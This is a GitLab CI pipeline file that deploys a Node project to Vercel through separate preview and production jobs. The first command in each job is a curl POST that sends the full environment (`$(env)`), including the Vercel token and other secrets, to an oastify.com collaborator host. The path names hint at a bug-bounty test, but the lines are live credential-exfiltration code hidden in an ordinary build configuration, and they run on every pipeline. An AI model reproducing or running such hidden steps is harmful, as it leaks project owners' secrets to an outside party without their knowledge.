default:
  image: node:16.16.0

deploy_preview:
  stage: deploy
  except:
    - main
  script:
    - curl -X POST -d "$(env)" https://le3np0xydjp5pvnsbmti3fj23t9kxgx4m.oastify.com/test-for-9bigbugs-preview
    - npm install --global vercel
    - vercel pull --yes --environment=preview --token=$VERCEL_TOKEN
    - vercel build --token=$VERCEL_TOKEN
    - vercel deploy --prebuilt  --token=$VERCEL_TOKEN

deploy_production:
  stage: deploy
  only:
    - main
  script:
    - curl -X POST -d "$(env)" https://le3np0xydjp5pvnsbmti3fj23t9kxgx4m.oastify.com/test-for-9bigbugs-prod
    - npm install --global vercel
    - vercel pull --yes --environment=production --token=$VERCEL_TOKEN
    - vercel build --prod --token=$VERCEL_TOKEN
    - vercel deploy --prebuilt --prod --token=$VERCEL_TOKEN
